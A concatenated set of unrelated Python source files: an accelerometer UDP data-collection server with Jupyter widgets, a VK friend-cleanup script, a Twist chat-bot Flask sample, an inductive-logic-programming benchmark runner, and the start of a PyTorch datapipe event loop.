ipmaybe = ([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [
[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in
[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])
ipmaybe = [ipmaybe] if type(ipmaybe) is str else ipmaybe
if type(ipmaybe) is str:
default = ipmaybe
else:
default = ipmaybe[0]
for ip in ipmaybe:
if ip.startswith(PREFER_SUBNET):
default = ip
return ipmaybe, default
# Updates UI status during data collection
def update_status():
global miliseconds_label
global sample_count_labels
global ms
milliseconds_label.value = str(ms)
for client in clients:
sample_count_labels[client.clientId].value = str(len(client.events))
# Formats a single client data event for fractions of Gs
def format_event(clientId, event):
output_arr = [None] * 5
output_arr[0] = str(clientId)
output_arr[1] = event[1]
output_arr[2] = float(event[2]) / dividers[samplerange]
output_arr[3] = float(event[3]) / dividers[samplerange]
output_arr[4] = float(event[4]) / dividers[samplerange]
return output_arr
# Writes client data to CSV
def write_data(filename):
if filename.find('.csv') <= -1:
filename = filename.strip() + '.csv'
f = open(filename, 'w')
f.write("clientId,ms,x,y,z")
f.write("\n")
for key in clients:
client = clients[key]
for event in client.events:
output_arr = format_event(client.clientId, event)
outs = [ str(val) for val in output_arr ]
output = ",".join(outs)
f.write(output)
f.write("\n")
client.events = list()
f.flush()
f.close()
print("Data written to " + filename)
pass
# Starts server threads (and user interface)
def start():
cpanel()
global HOST
if HOST is None:
_, HOST = get_interfaces()
print("Starting station " + STATION_ID + " on " + str(HOST) + " with port " + str(PORT))
try:
global monitor_thread
monitor_thread = MonitorThread()
monitor_thread.start()
accelServer = ThreadedUDPServer((HOST, PORT), AccelUDPHandler)
accelThread = Thread(target=accelServer.serve_forever)
accelThread.start()
print("Server is listening")
except Exception as e:
print(e)
# Outputs a matplotlib preview of client data
def plot():
print("Plotting preview...")
global clients
f, subplots = plt.subplots(len(clients), 3, sharex='col', sharey='row')
for i in range(len(clients.keys())):
client = clients[clients.keys()[i]]
client_name = client.clientId
if len(clients) == 1:
x = subplots[0]
y = subplots[1]
z = subplots[2]
else:
x = subplots[i][0]
y = subplots[i][1]
z = subplots[i][2]
x.set_title(client_name + " x")
y.set_title(client_name + " y")
z.set_title(client_name + " z")
ms = list()
x_vals = list()
y_vals = list()
z_vals = list()
for event in client.events:
scaled = format_event(client.clientId, event)
ms.append(scaled[1])
x_vals.append(scaled[2])
y_vals.append(scaled[3])
z_vals.append(scaled[4])
x.scatter(ms, x_vals)
y.scatter(ms, y_vals)
z.scatter(ms, z_vals)
# Builds export panel UI tab
def build_export_panel():
global clients
export_text = widgets.Text(
value="accelerometer.csv"
)
export_button = widgets.Button(
description="Export"
)
preview_button = widgets.Button(
description="Preview"
)
def export_click(b):
write_data(export_text.value)
def preview_click(b):
plot()
export_button.on_click(export_click)
preview_button.on_click(preview_click)
left = widgets.VBox([widgets.Label(value="Filename"), widgets.Label()])
middle = widgets.VBox([export_text, widgets.Label()])
right = widgets.VBox([export_button, preview_button])
export_panel = widgets.HBox([left, middle, right])
return export_panel
# Builds status panel UI tab
def build_status_panel():
global clients
global sample_count_labels
start = widgets.Button(
description="Start"
)
stop = widgets.Button(
description="Stop"
)
def stop_click(b):
halt_data_collection()
def start_click(b):
signal_start()
start.on_click(start_click)
stop.on_click(stop_click)
col1_children = [ start, stop, widgets.Label() ]
col2_children = [ widgets.Label() ] * 3
col3_children = [ widgets.Label(value="Milliseconds", layout=widgets.Layout(width="100%")), widgets.Label(), widgets.Label(value="Status") ]
col4_children = [ milliseconds_label, widgets.Label(), widgets.Label("Samples")]
for _, accel in clients:
col2_children.append(widgets.Label(value=accel.clientId))
status_labels[accel.clientId] = widgets.Label(
value=accel.state,
layout=widgets.Layout(width="100%")
)
col3_children.append(status_labels[accel.clientId])
sample_count_labels[accel.clientId] = widgets.Label(
value=str(len(accel.events))
)
col4_children.append(sample_count_labels[accel.clientId])
status_panel = widgets.HBox([widgets.VBox(col1_children), widgets.VBox(col2_children), \
widgets.VBox(col3_children), widgets.VBox(col4_children)])
return status_panel
# Builds settings panel UI tab
def build_settings_panel():
def get_new_value(change):
if change['type'] == 'change' and change['name'] == 'value':
return change['new']
else:
return None
def rate_setting_change(change):
global samplerate
val = get_new_value(change)
if val:
samplerate = val
broadcast_configure()
def range_setting_change():
global samplerange
val = get_new_value(change)
if val:
samplerange = val
broadcast_configure()
rate_setting = widgets.Dropdown(
options = list(zip(["1 Hz", "10 Hz", "25 Hz", "50 Hz", "100 Hz", "200 Hz", "400 Hz"], ["a", "b", "c", "d", "e", "f", "g"])),
value = samplerate
)
rate_setting.observe(rate_setting_change)
range_setting = widgets.Dropdown(
options = list(zip(["2 G", "4 G", "8 G", "16 G"], ["a", "b", "c", "d"])),
value = samplerange
)
range_setting.observe(range_setting_change)
labels = [widgets.Label(value=x) for x in ["Rate", "Range"]]
settings = [rate_setting, range_setting]
label_box = widgets.VBox(labels)
settings_box = widgets.VBox(settings)
config_options = widgets.HBox([label_box, settings_box])
return config_options
# Shows main user interface
def cpanel():
global _main_tabs
_main_tabs = widgets.Tab()
global _status_panel
global _export_panel
global _settings_panel
_status_panel = build_status_panel()
_export_panel = build_export_panel()
_settings_panel = build_settings_panel()
_main_tabs.children = [ _status_panel, _export_panel, _settings_panel ]
_main_tabs.set_title(0, "Collect Data")
_main_tabs.set_title(1, "Export Data")
_main_tabs.set_title(2, "Settings")
display(_main_tabs)
# Interactively configure server options before startup
def configure():
interfaces, default = get_interfaces()
interfaces = widgets.Dropdown(
options = interfaces,
value = default,
)
port = widgets.Text(
value='9999',
placeholder='Port',
disabled=False
)
server_id_text = widgets.Text(
value='codetacc',
placeholder='Station ID',
disabled=False
)
header = widgets.Label(
value='Configure your server',
layout=widgets.Layout(width='100%')
)
go = widgets.Button(
description='Start server',
layout=widgets.Layout(width="100%")
)
left_box = widgets.VBox([ widgets.Label(value=x, disabled=True) for x in ["Interface", "Port", "Station ID", ""] ])
right_box = widgets.VBox([interfaces, port, server_id_text, go])
settings_box = widgets.HBox([left_box, right_box])
settings_panel = widgets.VBox([header, settings_box])
def start_clicked(b):
settings_panel.close()
cpanel()
global STATION_ID
global HOST
global PORT
HOST = interfaces.value
PORT = int(port.value)
STATION_ID = server_id_text.value
start()
go.on_click(start_clicked)
display(settings_panel)
|
clean.py
|
#Python 3.7.4
#Make by: Lonely Dark
#Import modules:
import requests
from time import sleep, strftime
from random import randint
import threading
#Your token:
token='Token here:'
def post(token,fr_list_id):
#Post in your wall
message='This is auto message. Cleared friends: \n '+ str(fr_list_id[::]) + '\n \n Script finished at ' + strftime('%H:%M:%S') + ' ' + strftime('%x')
requests.get('https://api.vk.com/method/wall.post', params={'access_token': token, 'v': '5.101','message': message}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Request vk_api wall.post'+'\n')
def clear(token):
#Get friends
fr_get_del=requests.get('https://api.vk.com/method/friends.get', params={'access_token': token, 'v': '5.101', 'fields': 'deactivated'}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Request vk_api friends.get'+'\n')
fr_get_del=fr_get_del['response']
fr_list_id=[]
#Get friend deleted or banned
for i in fr_get_del['items']:
if 'deactivated' in i:
fr_list_id=[i['id']]
#If in fr_list_id nothing:
if len(fr_list_id)==0:
print('Not found deactivated.')
message='This is auto message. \n Not found friends deactivated, goodbye! \n \n Script finished at ' + strftime('%H:%M:%S') + ' ' + strftime('%x')
requests.get('https://api.vk.com/method/wall.post', params={'access_token': token, 'v': '5.101', 'message': message}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Nothing in fr_list_id, exit.'+'\n')
return False
else:
#Else:
for i in fr_list_id:
#Delete friends banned or deleted
requests.get('https://api.vk.com/method/friends.delete', params={'access_token': token, 'v': '5.101', 'user_id': i}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Delete friend: @id' + str(i)+'\n')
#Sleep random range 0,3 sec
sleep(randint(0,3))
#Add to fr_list_id @id
for i in range(len(fr_list_id)):
fr_list_id[i]='@id'+str(fr_list_id[i])
print('Delete: \n'+ str(fr_list_id[::]))
#Run post()
th=threading.Thread(target=post, args=(token,fr_list_id))
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Run Thread post'+'\n')
th.start()
main=threading.Thread(target=clear, args=(token,))
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Run Thread main'+'\n')
main.start()
main.join()
|
server.py
|
from flask import Flask, request, Response
import requests
import time
from datetime import datetime
from threading import Thread
app = Flask(__name__)
app.debug = True
GREETINGS = ["HI", "HELLO", "HEY"]
@app.route("/bot", methods=["POST"])
def message_received():
request_data = request.form
event_type = request_data.get("event_type")
# It's good practice with Twist integrations to support being
# pinged, it's a good way to test that your integration is
# successfully talking to Twist. This ping is done from the bot
# section of the integration's configuration
if event_type == "ping":
return Response("pong")
# Here we pass the processing of the message off to a background thread
# We do this so that we can immediately respond to the message to
# acknowledge we've received it
thr = Thread(target=process_bot_conversation, args=[request_data])
thr.start()
# This tells the server we've received the message ok
# Optionally, you can also respond with some message text, this
# text would then be displayed as a message to the user who sent
# it. This message could be to say that the bot is handling their
# request
return "", 202
def process_bot_conversation(form_data):
url_callback = form_data.get("url_callback")
url_ttl = form_data.get("url_ttl")
message = create_message_response(form_data)
# We need to check whether the callback url has timed out, we
# give you 30 minutes in order to send your message, after which
# the callback url will have expired
if url_has_timed_out(url_ttl):
print(
"URL for responding has timed out, message id: %s"
% form_data.get("message_id")
)
return
send_reply(url_callback, message)
def create_message_response(form_data):
"""This method is the crux of the bot in terms of determining the content
that will be returned to the user"""
current_content = form_data.get("content")
message = "I didn't understand that please type 'help' to see how to use this bot"
greeting = next(
(x for x in GREETINGS if current_content.upper().startswith(x)), "none"
)
if not greeting == "none":
user_name = form_data.get("user_name")
message = u"Hello %s!" % (user_name)
# This is here to purely demonstrate that a bot's response could
# take a while, thus why this sample is showing how to use the
# url_callback approach.
time.sleep(5)
elif current_content == "help":
message = "This sample allows you to say 'hi' or 'hello' to the bot"
return message
def send_reply(url_callback, message):
payload = {"content": message}
response = requests.post(url_callback, data=payload)
response_json = response.json()
if "error_string" in response_json.keys():
print("API error: %s" % response_json["error_string"])
return
else:
if response.status_code == 200:
print("Message sent successfully")
else:
print(
"There was an error posting the message, status code: %s",
response.status_code,
)
def url_has_timed_out(url_ttl):
ttl_datetime = datetime.fromtimestamp(float(url_ttl))
now = datetime.now()
return now > ttl_datetime
|
benchmark.py
|
#!/usr/bin/env python3
import os
import sys
import psutil
import pathlib
import subprocess
import numpy as np
import scipy.stats as stats
from popper.split import runner, prog_to_code
from popper.utils import Settings
from pyswip import Prolog
from multiprocessing.pool import Pool, ThreadPool
from multiprocessing import Process
import multiprocessing
import gen_data
import time
import pathlib
import logging
import random
import math
from datetime import datetime
NUM_TRAIN_EXAMPLES = 10
NUM_TEST_EXAMPLES = 1000
NUM_CPUS = 1
TIMEOUT = 300
TRIALS = list(range(1,21))
TASKS = []
TASKS += ['trains1']
TASKS += ['trains2']
TASKS += ['trains3']
TASKS += ['trains4']
TASKS += ['iggp-minimal-decay']
TASKS += ['iggp-buttons']
TASKS += ['iggp-rps']
TASKS += ['iggp-coins']
TASKS += ['dropk']
TASKS += ['droplast']
TASKS += ['evens']
TASKS += ['finddup']
TASKS += ['last']
TASKS += ['len']
TASKS += ['sorted']
TASKS += ['sumlist']
path = pathlib.Path().resolve()
def partmap(func, jobs, num_cups = NUM_CPUS):
if num_cups == 1:
return list(map(func, jobs))
with ThreadPool(num_cups) as p:
return list(p.map(func, jobs))
def get_time():
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
return current_time
def parpmap(func, jobs, num_cups = NUM_CPUS):
# p = ctx.Process(target=run_experiment, args=(problem, config, experiment, sema, results), name=f'{problem}::{config}')
# p.start()
# if num_cups == 1:
# return list(map(func, jobs))
with Pool(num_cups, maxtasksperchild=1) as p:
return list(p.map(func, jobs))
# # old and horrible code
def call_(cmd, action=None, timeout=None):
cmd = cmd.split(' ')
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if action != None:
p.stdin.write(action.encode('utf-8'))
try:
output, _err = p.communicate(timeout = timeout)
return output.decode()
except subprocess.TimeoutExpired:
pass
finally:
try:
parent = psutil.Process(p.pid)
for child in parent.children(recursive=True):
child.kill()
except psutil.NoSuchProcess:
pass
p.kill()
def call_prolog(files, action, timeout):
files = ','.join((f"'{x}'" for x in files))
cmd = f"load_files([{files}],[silent(true)]). {action}."
# print(cmd)
return call_('swipl -q', cmd, timeout)
def train_metagol(settings):
task = settings.task
trial = settings.trial
metarules = 'metarules'
if 'iggp' in task:
ex_file = f'data/{task}/data/train/exs.pl'
prim_file = f'data/{task}/metagol.pl'
bk_file = f'data/{task}/data/train/bk.pl'
elif 'train' in task:
ex_file = f'data/{task}/data/train/{trial}.pl'
prim_file = f'data/prims-trains.pl'
bk_file = f'data/bk-trains.pl'
else:
ex_file = f'data/{task}/data/train/{trial}.pl'
prim_file = f'data/prims-lists.pl'
bk_file = f'data/bk-lists.pl'
metarules = 'metarules-rec'
load_files = ['metagol', prim_file, metarules, ex_file, bk_file]
t1 = time.time()
prog = call_prolog(load_files, 'run', TIMEOUT)
t2 = time.time()
if prog != None:
prog = [x for x in prog.split('\n') if ':-' in x]
save_prog(settings, prog, t2-t1)
def train_aleph(settings):
task = settings.task
trial = settings.trial
if 'iggp' in task:
train_file = f'{path}/data/{task}/aleph.pl'
else:
train_file = f'{path}/data/{task}/data/aleph/{trial}.pl'
cmd = "induce(P),writeln('<PROG>'),numbervars(P,0,_),foreach(member(C,P),(write(C),write('. '))),writeln('</PROG>'),halt"
load_files = [train_file]
t1 = time.time()
try:
prog = call_prolog(load_files, cmd, TIMEOUT)
except:
prog = None
t2 = time.time()
if prog != None:
xs = prog.split('<PROG>')
if len(xs) > 1:
prog = xs[1].split('</PROG>')[0]
# print('PROG1',prog)
prog = prog.replace('\n', ' ')
prog = [x.strip() for x in prog.split('.') if len(x.strip()) > 0]
# print('PROG2',prog)
else:
prog = None
save_prog(settings, prog, t2-t1)
def gen_aleph_input(pos, neg, bk_file, bias_file, out_file):
with open(out_file, 'w') as f:
# read general aleph settings
with open(bias_file) as tmp:
f.write(tmp.read() + '\n')
f.write(':-begin_bg.\n')
with open(bk_file) as tmp:
f.write(tmp.read() + '\n')
f.write(':-end_bg.\n')
f.write(':-begin_in_pos.\n')
for x in pos:
x = x[4:].replace('))',')')
f.write(x + '\n')
f.write(':-end_in_pos.\n')
f.write(':-begin_in_neg.\n')
for x in neg:
x = x[4:].replace('))',')')
f.write(x + '\n')
f.write(':-end_in_neg.\n')
def gen_list_data():
probs = []
probs += [('dropk', gen_data.DropK)]
probs += [('droplast', gen_data.DropLast)]
probs += [('evens', gen_data.Evens)]
probs += [('finddup', gen_data.FindDupl)]
probs += [('last', gen_data.Last)]
probs += [('len', gen_data.Len)]
probs += [('member', gen_data.Member)]
probs += [('sorted', gen_data.Sorted)]
probs += [('sumlist', gen_data.SumList)]
for (task, _) in probs:
with open(f'data/{task}/all-bias.pl', 'w') as f:
with open(f'data/bias-list.pl') as tmp:
for line in tmp:
f.write(line)
f.write('\n')
with open(f'data/{task}/bias.pl') as tmp:
for line in tmp:
f.write(line)
for (task, x) in probs:
pathlib.Path(f'{path}/data/{task}/data/train/').mkdir(parents=True, exist_ok=True)
pathlib.Path(f'{path}/data/{task}/data/test/').mkdir(parents=True, exist_ok=True)
pathlib.Path(f'{path}/data/{task}/data/programs').mkdir(parents=True, exist_ok=True)
pathlib.Path(f'{path}/data/{task}/data/results').mkdir(parents=True, exist_ok=True)
for trial in TRIALS:
print(get_time(),f'GEN DATA: task:{task}\t trial:{trial}')
# TRAIN DATA
train_ex_file = f'{path}/data/{task}/data/train/{trial}.pl'
train_pos = [x.gen_pos() for i in range(NUM_TRAIN_EXAMPLES)]
train_neg = [x.gen_neg() for i in range(NUM_TRAIN_EXAMPLES)]
with open(train_ex_file, 'w') as f:
for ex in train_pos:
f.write(f'pos({ex}).\n')
for ex in train_neg:
f.write(f'neg({ex}).\n')
# TEST DATA
train_ex_file = f'{path}/data/{task}/data/test/{trial}.pl'
test_pos = [x.gen_pos() for i in range(NUM_TEST_EXAMPLES)]
test_neg = [x.gen_neg() for i in range(NUM_TEST_EXAMPLES)]
with open(train_ex_file, 'w') as f:
for ex in test_pos:
f.write(f'pos({ex}).\n')
for ex in test_neg:
f.write(f'neg({ex}).\n')
# WRITE ALEPH INPUT
pathlib.Path(f'{path}/data/{task}/data/aleph/').mkdir(parents=True, exist_ok=True)
train_ex_file = f'{path}/data/{task}/data/aleph/{trial}.pl'
with open(train_ex_file, 'w') as f:
# read general aleph settings
with open('aleph-lists.pl') as tmp:
f.write(tmp.read() + '\n')
# read task-specific aleph settings
with open(f'{path}/data/{task}/aleph.pl') as tmp:
f.write(tmp.read() + '\n')
f.write(':-begin_bg.\n')
with open('data/bk-lists.pl') as tmp:
f.write(tmp.read() + '\n')
f.write(':-end_bg.\n')
f.write(':-begin_in_pos.\n')
for ex in train_pos:
f.write(ex + '.\n')
f.write(':-end_in_pos.\n')
f.write(':-begin_in_neg.\n')
for ex in train_neg:
f.write(ex + '.\n')
f.write(':-end_in_neg.\n')
def partition(xs, rate=80):
k = int((len(xs) / 100)*rate)
return xs[:k], xs[k:]
def gen_train_data():
probs = []
probs += ['trains1']
probs += ['trains2']
probs += ['trains3']
probs += ['trains4']
for task in probs:
pos = []
neg = []
with open(f'data/{task}/exs.pl') as f:
for line in f:
line = line.strip()
if line.startswith('pos'):
pos.append(line)
elif line.startswith('neg'):
neg.append(line)
for trial in TRIALS:
random.shuffle(pos)
random.shuffle(neg)
train_pos, test_pos = partition(pos)
train_neg, test_neg = partition(neg)
path = f'data/{task}/data/train/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
with open(f'{path}/{trial}.pl', 'w') as f:
for x in train_pos + train_neg:
f.write(x + '\n')
path = f'data/{task}/data/test/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
with open(f'{path}/{trial}.pl', 'w') as f:
for x in test_pos + test_neg:
f.write(x + '\n')
path = f'data/{task}/data/aleph/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
# ALEPH
gen_aleph_input(pos, neg, 'data/bk-trains.pl', f'data/aleph-trains.pl', f'{path}/{trial}.pl',)
def get_prog_file(settings):
path = f'data/{settings.task}/programs'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
fname = f'{path}/{settings.name}-{settings.trial}.csv'
return fname
def save_prog(settings, prog, duration):
fname = get_prog_file(settings)
with open(fname, 'w') as f:
if prog != None:
for rule in prog:
if rule[-1] != '.':
rule += '.'
f.write(rule + '\n')
f.write(f'%time,{duration}\n')
def save_res(settings, tp, fn, tn, fp):
path = f'data/{settings.task}/results/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
fname = f'{path}/{settings.name}-{settings.trial}.csv'
with open(fname, 'w') as f:
f.write(f'{tp}, {fn}, {tn}, {fp}')
# def test_(settings):
# prolog = Prolog()
# prolog.consult(settings.ex_file)
# prolog.consult(settings.bk_file)
# prolog.consult('test.pl')
# prolog.consult(f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv')
# res = list(prolog.query('do_test(TP,FN,TN,FP)'))[0]
# print(settings.name, settings.trial, res)
# save_res(settings, res['TP'], res['FN'], res['TN'], res['FP'])
def test_(settings):
from multiprocessing import Process
p = Process(target=test__, args=(settings,))
p.start()
p.join()
def test__(settings):
prolog = Prolog()
prolog.consult(settings.ex_file)
prolog.consult(settings.bk_file)
prolog.consult('test.pl')
prolog.consult(f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv')
res = list(prolog.query('do_test(TP,FN,TN,FP)'))[0]
save_res(settings, res['TP'], res['FN'], res['TN'], res['FP'])
# def test_(settings):
# # prolog = Prolog()
# load_files = [settings.ex_file, settings.bk_file, 'test.pl', f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv']
# cmd = 'do_test(TP,FN,TN,FP),halt.'
# print(settings.name, settings.trial, res)
# # save_res(settings, res['TP'], res['FN'], res['TN'], res['FP'])
def train_(settings):
t1 = time.time()
prog = runner(settings)
t2 = time.time()
if prog != None:
prog = prog_to_code(prog)
save_prog(settings, prog, t2-t1)
def train_lists(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/train/{settings.trial}.pl'
settings.bias_file = f'{path}/data/{settings.task}/all-bias.pl'
settings.bk_file = f'{path}/data/bk-lists.pl'
train_(settings)
def train_iggp(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/train/exs.pl'
settings.bias_file = f'{path}/data/{settings.task}/bias.pl'
settings.bk_file = f'{path}/data/{settings.task}/data/train/bk.pl'
train_(settings)
def train_trains(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/train/{settings.trial}.pl'
settings.bias_file = f'{path}/data/bias-trains.pl'
settings.bk_file = f'{path}/data/bk-trains.pl'
train_(settings)
def test_lists(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/test/{settings.trial}.pl'
settings.bias_file = f'{path}/data/{settings.task}/all-bias.pl'
settings.bk_file = f'{path}/data/bk-lists.pl'
def test_iggp(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/test/exs.pl'
settings.bias_file = f'{path}/data/{settings.task}/bias.pl'
settings.bk_file = f'{path}/data/{settings.task}/data/test/bk.pl'
def test_trains(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/test/{settings.trial}.pl'
settings.bias_file = f'{path}/data/{settings.task}/bias.pl'
settings.bk_file = f'{path}/data/bk-trains.pl'
def get_metagol_settings(task, trial):
settings = Settings(cmd_line=False)
settings.task = task
settings.trial = trial
settings.name = 'metagol'
return settings
def get_aleph_settings(task, trial):
settings = Settings(cmd_line=False)
settings.task = task
settings.trial = trial
settings.name = 'aleph'
return settings
def get_settings(trial, task, baseline=False, constraints=True, chunking=True, lazy=True, optimistic=False):
settings = Settings(cmd_line=False)
settings.eval_timeout = 0.001
settings.timeout = TIMEOUT
settings.trial = trial
settings.task = task
settings.baseline = baseline
settings.constraints = constraints
settings.chunking = chunking
settings.lazy = lazy
settings.optimistic = optimistic
if baseline:
settings.name = f'popper'
elif optimistic:
settings.name = f'optimistic'
elif constraints == False:
settings.name = f'dumb'
elif chunking == False:
settings.name = 'no-chunking'
elif lazy == False:
settings.name = 'no-eagerness'
else:
settings.name = f'dcc'
return settings
def train_popper(settings):
if 'iggp' in settings.task:
train_iggp(settings)
elif 'train' in settings.task:
train_trains(settings)
else:
train_lists(settings)
def test_popper(settings):
print(get_time(),f'TEST: task:{settings.task}\t task:{settings.name}\t trial:{settings.trial}')
if 'iggp' in settings.task:
test_iggp(settings)
elif 'train' in settings.task:
test_trains(settings)
else:
test_lists(settings)
test_(settings)
def myround(x):
if x < 1:
x = round(x,1)
if x == 0:
return 0
return x
return int(x)
def get_predictions(settings, stuff):
prolog = Prolog()
prolog.consult(settings.ex_file)
prolog.consult(settings.bk_file)
prolog.consult('test.pl')
prolog.consult(f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv')
res = list(prolog.query('get_predictions(S0,S1)'))[0]
stuff['stuff'] = res['S0']+res['S1']
def get_acc_array(task, settings, trial):
with multiprocessing.Manager() as manager:
l = manager.dict()
l['stuff'] = None
p = Process(target=get_predictions, args=(settings, l))
p.start()
p.join()
# print(l['stuff'])
return l['stuff']
def get_accs(task, settings):
path = f'data/{task}/results/'
accs = []
for trial in TRIALS:
fname = f'{path}/{settings.name}-{trial}.csv'
with open(fname) as f:
for line in f:
xs = line.split(',')
if len(xs) > 1:
# print(task, settings.name, line)
tp, fn, tn, fp = int(xs[0]), int(xs[1]), int(xs[2]), int(xs[3])
# print(tp,fn,tn,fp)
# accs.append(tp / (tp+fn))
accs.append((tp + tn) / (tp+fn+tn+fp))
return int(np.mean(accs)*100), int(stats.sem(accs)*100)
def get_time_(task, settings, trial):
settings.task = task
settings.trial = trial
fname = get_prog_file(settings)
with open(fname) as f:
for line in f:
if line.startswith('%time'):
return float(line.split(',')[1])
def get_times(task, settings):
settings.task = task
times = []
for trial in TRIALS:
settings.trial = trial
fname = get_prog_file(settings)
with open(fname) as f:
for line in f:
if line.startswith('%time'):
times.append(float(line.split(',')[1]))
return myround(np.mean(times)), myround(stats.sem(times))
def print_rows(systems, func):
for task in TASKS:
x = '\\tw{' + task + '}'
for system in systems:
value,err = func(task, system)
x += f' & {value} $\pm$ {err}'
x+= ' \\\\'
print(x)
# def tests():
# # dcc
# x = get_settings(1, 1)
# # popper
# # y = get_settings(1, 1, baseline=True)
# # no constraints
# # y = get_settings(1, 1, constraints=False)
# # lazy
# # y = get_settings(1, 1, lazy=False)
# # compression
# y = get_settings(1, 1, chunking=False)
# accs = {system:[] for system in [x, y]}
# times = {system:[] for system in [x, y]}
# for system in [x, y]:
# for task in TASKS:
# for trial in TRIALS:
# acc = get_acc_(task, system, trial)
# time = get_time_(task, system, trial)
# accs[system].append(acc)
# times[system].append(time)
# # xs = accs[x]
# # ys = accs[y]
# # McN = math.pow((b-c),2) / (b+c)
# # print(f'accuracies p-value: {1-stats.chi2.cdf(McN,1):.3f}')
# xs = times[x]
# ys = times[y]
# print(xs)
# print(ys)
# res = stats.ttest_rel(xs, ys)
# print(f'times p-value: {res.pvalue:.5f}')
def tests():
# dcc
x = get_settings(1, 1)
# popper
y = get_settings(1, 1, baseline=True)
# no constraints
# y = get_settings(1, 1, constraints=False)
# lazy
# y = get_settings(1, 1, lazy=False)
# compression
# y = get_settings(1, 1, chunking=False)
# TRIALS = [2]
# T
# ACCS
predictions = {system:[] for system in [x, y]}
for settings in [x, y]:
for task in TASKS:
settings.task = task
for trial in TRIALS:
settings.trial = trial
if 'iggp' in task:
test_iggp(settings)
elif 'train' in task:
test_trains(settings)
else:
test_lists(settings)
predictions[settings].extend(get_acc_array(task, settings, trial))
xs = predictions[x]
ys = predictions[y]
print('xs',xs)
print('ys',ys)
b = sum(1.0 for (x, y) in zip(xs, ys) if x == 1 and y == 0)
c = sum(1.0 for (x, y) in zip(xs, ys) if x == 0 and y == 1)
print(b, c)
McN = math.pow((b-c),2) / (b+c)
print(f'accuracies p-value: {1-stats.chi2.cdf(McN,1):.3f}')
# times = {system:[] for system in [x, y]}
# TIMES
# for system in [x, y]:
# for task in TASKS:
# for trial in TRIALS:
# time = get_time_(task, system, trial)
# times[system].append(time)
# xs = times[x]
# ys = times[y]
# print(xs)
# print(ys)
# res = stats.ttest_rel(xs, ys)
# print(f'times p-value: {res.pvalue:.5f}')
def print_results1():
systems = []
# dcc
systems.append(get_settings(1, 1))
# popper
systems.append(get_settings(1, 1, baseline=True))
# aleph
systems.append(get_aleph_settings(1, 1))
# metagol
systems.append(get_metagol_settings(1, 1))
print_rows(systems, get_accs)
print('TIMES'*10)
print_rows(systems, get_times)
def print_results2():
systems = []
# dcc
systems.append(get_settings(1, 1))
# optimistic dcc
systems.append(get_settings(1, 1, optimistic=True))
# dcc without constraints
systems.append(get_settings(1, 1, constraints=False))
# dcc without lazy coverage
systems.append(get_settings(1, 1, lazy=False))
# dcc without chunking
systems.append(get_settings(1, 1, chunking=False))
print_rows(systems, get_accs)
print('TIMES'*10)
print_rows(systems, get_times)
def train_aux(job):
print(get_time(), f'TRAIN {job.name}: task:{job.task}\t trial:{job.trial}')
if job.name == 'metagol':
train_metagol(job)
elif job.name == 'aleph':
train_aleph(job)
else:
train_popper(job)
def do_it(mode):
jobs = []
for trial in TRIALS:
for task in TASKS:
# aleph
jobs.append(get_aleph_settings(task, trial))
# metagol
jobs.append(get_metagol_settings(task, trial))
# popper
jobs.append(get_settings(trial, task, baseline=True))
# dcc
jobs.append(get_settings(trial, task))
# optimistic dcc
jobs.append(get_settings(trial, task, optimistic=True))
# dcc without constraints
jobs.append(get_settings(trial, task, constraints=False))
# dcc without chunking
jobs.append(get_settings(trial, task, chunking=False))
# dcc without lazy coverage
jobs.append(get_settings(trial, task, lazy=False))
if mode == 'train':
partmap(train_aux, jobs)
elif mode == 'test':
print('testing')
partmap(test_popper, jobs)
elif mode == 'results':
print_results1()
print('----------')
print_results2()
if __name__ == '__main__':
# pass
x = sys.argv[1]
if x == 'gen':
gen_train_data()
gen_list_data()
do_it(x)
|
eventloop.py
|
import torch
import threading
import pickle
from torch.utils.data import IterDataPipe, communication, MapDataPipe
def DataPipeToQueuesLoop(source_datapipe, req_queue, res_queue):
if isinstance(source_datapipe, IterDataPipe):
pipe_type = communication.iter
protocol_type = communication.protocol.IterDataPipeQueueProtocolServer
elif isinstance(source_datapipe, MapDataPipe):
pipe_type = communication.map # type: ignore[misc]
protocol_type = communication.protocol.MapDataPipeQueueProtocolServer # type: ignore[assignment]
else:
raise Exception('Only supports IterDataPipe or MapDataPipe, got', source_datapipe)
torch.set_num_threads(1)
for _ in pipe_type.DataPipeBehindQueues(source_datapipe, protocol_type(req_queue, res_queue),
blocking_request_get=True):
pass
def SpawnProcessForDataPipeline(multiprocessing_ctx, datapipe):
req_queue = multiprocessing_ctx.Queue()
res_queue = multiprocessing_ctx.Queue()
process = multiprocessing_ctx.Process(
target=DataPipeToQueuesLoop, args=(datapipe, req_queue, res_queue))
return process, req_queue, res_queue
def SpawnThreadForDataPipeline(datapipe):
